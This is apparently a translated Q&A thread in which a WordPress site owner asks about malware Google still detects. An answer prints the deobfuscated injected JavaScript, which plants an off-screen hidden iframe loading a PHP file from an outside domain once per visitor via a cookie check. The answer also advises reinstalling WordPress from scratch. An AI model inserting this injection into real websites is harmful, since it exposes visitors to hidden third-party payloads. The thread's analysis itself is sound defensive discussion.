我的wordpress网站最近被恶意软件感染,并被列入黑名单.我以为我通过更新网站和插件并删除任何我无法识别的代码来修复它.
然后我使用了Sucuri Site Checker,看起来没问题,所以我向Google提交了一份评论请求.但是,Google表示它仍然包含恶意代码形式的恶意软件(他们称之为代码注入).
我有点迷失了该做什么.有没有办法找到谷歌找到的代码?该域名是sudorf.co.uk但它有恶意软件所以我不建议去那里 – 不知道恶意软件会做什么.
任何帮助将不胜感激.
编辑:我几天前找到了代码并删除了它,然后我更新了所有版本等.但显然它又回来了.有没有人知道如何到达那里.我的想法是它来自一个插件 – 这就是为什么我要删除所有这些.另一种是联系表格 – 但我不认为这会让他们编辑header.PHP.
这是纯粹的信息.当它被去混淆时,您的恶意软件看起来像这样:
原文链接:https://www.f2er.com/php/136277.htmlfunction k09() {
var static = 'ajax';
var controller = 'index.PHP';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.PHP';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0,name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";",len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len,end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq','55','1','/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.PHP只输出“OK”.
为什么?
我的猜测是这是一个IP /流量记录器.也许黑客可以检查哪些博客最活跃,然后又回来破解那个特定网站(不需要浪费时间在每月有2位访问者的网站上).这是好事还是坏事.
糟糕的是,他们很可能已经下载了整个数据库,因为他们显然已经在您的服务器上拥有执行权限,并且可能已将他们的PHP文件放在您的服务器上.你最好的选择是从一个新的WP开始,一个一个地复制插件/主题,同时手动检查它们.
